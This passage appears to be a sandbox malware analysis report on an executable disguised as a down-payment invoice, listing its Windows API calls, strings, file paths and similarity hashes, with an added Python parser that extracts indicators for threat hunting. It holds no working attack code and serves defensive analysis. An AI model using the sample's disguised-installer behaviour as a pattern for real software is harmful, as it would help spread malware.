• Instruction Fuzzy Hash: 03414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
Uniqueness
Uniqueness Score: -1.00%

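The CoCreateInstance entry above is the one function in this stretch of the listing that carries a concrete file-system string, a drop directory under the sandbox user's %LOCALAPPDATA%. Pulling such indicators out of a report this long by hand is error-prone, so the following is an added example, not part of the Joe Sandbox report or of its tooling: a small parser for function entries written in this page's layout (the "APIs", "Strings" and "Uniqueness Score" lines), which extracts each API call with its module, arguments, reference address and optional "Part of subcall function" parent, collects the strings, and turns any Windows path into a hunting indicator. It assumes that "user" is the sandbox account name (as the path on this page shows), so it rewrites that profile prefix to %LOCALAPPDATA%, since the literal C:\Users\user path will not exist on a real victim host. The sample records are constructed from the entries on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the report's own layout (leading whitespace trimmed);
# the records are copied from the entries on this page.
SAMPLE_REPORT = r"""
APIs
• Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Uniqueness
Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
Strings
• C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences, xrefs: 004021C3
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
Uniqueness Score: -1.00%
"""

API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
STR_RE = re.compile(r"^• (?P<value>.+), xrefs: (?P<xref>[0-9A-Fa-f]+)$")
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")
# Assumption: the sandbox runs the sample as the account "user"; rewrite that
# profile prefix so the indicator can be hunted for on any host.
SANDBOX_LOCALAPPDATA = re.compile(r"^C:\\Users\\user\\AppData\\Local", re.IGNORECASE)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Uniqueness"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str] = None   # address of the caller when marked "Part of subcall function"


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (value, xref address)
    uniqueness: Optional[float] = None


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing into function entries; each entry starts at an 'APIs' header."""
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            entries.append(FunctionEntry())
        if line in SECTION_HEADERS:
            section = line
            continue
        if not entries:
            continue  # stray lines before the first entry
        entry = entries[-1]
        if line.startswith("Uniqueness Score:"):
            entry.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            entry.apis.append(ApiCall(m["func"], m["mod"], args, m["ref"], m["parent"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            entry.strings.append((m["value"], m["xref"]))
    return entries


def host_iocs(entries: List[FunctionEntry]) -> dict:
    """Windows paths from the string lists, normalised for hunting, together with
    the APIs called by the same function (the context an analyst wants next to the path)."""
    iocs = {}
    for entry in entries:
        calls = sorted({f"{a.func}.{a.module}" for a in entry.apis})
        for value, xref in entry.strings:
            if WIN_PATH_RE.match(value):
                hunt_path = SANDBOX_LOCALAPPDATA.sub("%LOCALAPPDATA%", value)
                iocs[hunt_path] = {"xref": xref, "apis_in_same_function": calls}
    return iocs


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    for path, ctx in host_iocs(parsed).items():
        print(path, ctx)
```

Feed the script the text of the function listing (after trimming the page's indentation) and it yields one indicator per path string plus the API calls that sit in the same function, so a path that co-occurs with CoCreateInstance or FindFirstFileW can be triaged with that context rather than as a bare string.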
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
• Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
• Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
• Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
Uniqueness
Uniqueness Score: -1.00%

APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
• GetDlgItem.USER32(?,000003E8), ref: 004045D0
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
• GetSysColor.USER32(?), ref: 004045FE
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
• lstrlenW.KERNEL32(?), ref: 0040461F
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
• GetDlgItem.USER32(?,0000040A), ref: 0040469A
• SendMessageW.USER32(00000000), ref: 004046A1
• GetDlgItem.USER32(?,000003E8), ref: 004046CC
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
• LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
• SetCursor.USER32(00000000), ref: 00404720
• LoadCursorW.USER32(00000000,00007F00), ref: 00404739
• SetCursor.USER32(00000000), ref: 0040473C
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: Call$N
• API String ID: 3103080414-3438112850
• Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
• Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
• Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
• Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
• Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
• Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
• Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
• GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
• GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
• wsprintfA.USER32 ref: 004060B3
• GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
• SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
• GlobalFree.KERNEL32(00000000), ref: 0040619C
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
  • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
  • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
Strings
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
• Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
• Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
• Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
• CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
• CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
• CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
Strings
• "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 0040667C
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682
• *?|<>/":, xrefs: 004066CE
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-2488261258
• Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
• Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
• Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
• Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004043E3
• GetSysColor.USER32(00000000), ref: 00404421
• SetTextColor.GDI32(?,00000000), ref: 0040442D
• SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
• Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
• Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
• Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
• lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
• lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
• SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
• Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
• Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
• Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
• GetTickCount.KERNEL32 ref: 00402EC7
• wsprintfW.USER32 ref: 00402EF5
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
• CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
• ShowWindow.USER32(00000000,00000005), ref: 00402F27
  • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,000033C7), ref: 00402E87
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
• Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
• Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
• Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
• GetMessagePos.USER32 ref: 00404D3D
• ScreenToClient.USER32(?,?), ref: 00404D57
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
Strings
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
• wsprintfW.USER32 ref: 00402E45
• SetWindowTextW.USER32(?,?), ref: 00402E55
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
• Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
• Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
• Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
Uniqueness

Uniqueness Score: -1.00%

APIs
• Part of subcall function 6F1D121B: GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
• GlobalFree.KERNEL32(?), ref: 6F1D265B
• GlobalFree.KERNEL32(00000000), ref: 6F1D2690
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 791421b851ae5e2b98cbde333abe9436d808fe5e834d0b7580d6d4c80c793f08
• Instruction ID: 702a0ab72b9247450f8f2cf266c0cb103844c74b0ee0ae9084dba6bce483f985
• Opcode Fuzzy Hash: 791421b851ae5e2b98cbde333abe9436d808fe5e834d0b7580d6d4c80c793f08
• Instruction Fuzzy Hash: 5B310431209681EFCB108F64CD98C6AB7B6FB873D4710466DF96183260D732A836CF11
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
• GlobalFree.KERNEL32(?), ref: 00402956
• GlobalFree.KERNEL32(00000000), ref: 00402969
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
• Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
• Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
• Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
• wsprintfW.USER32 ref: 00404CB6
• SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
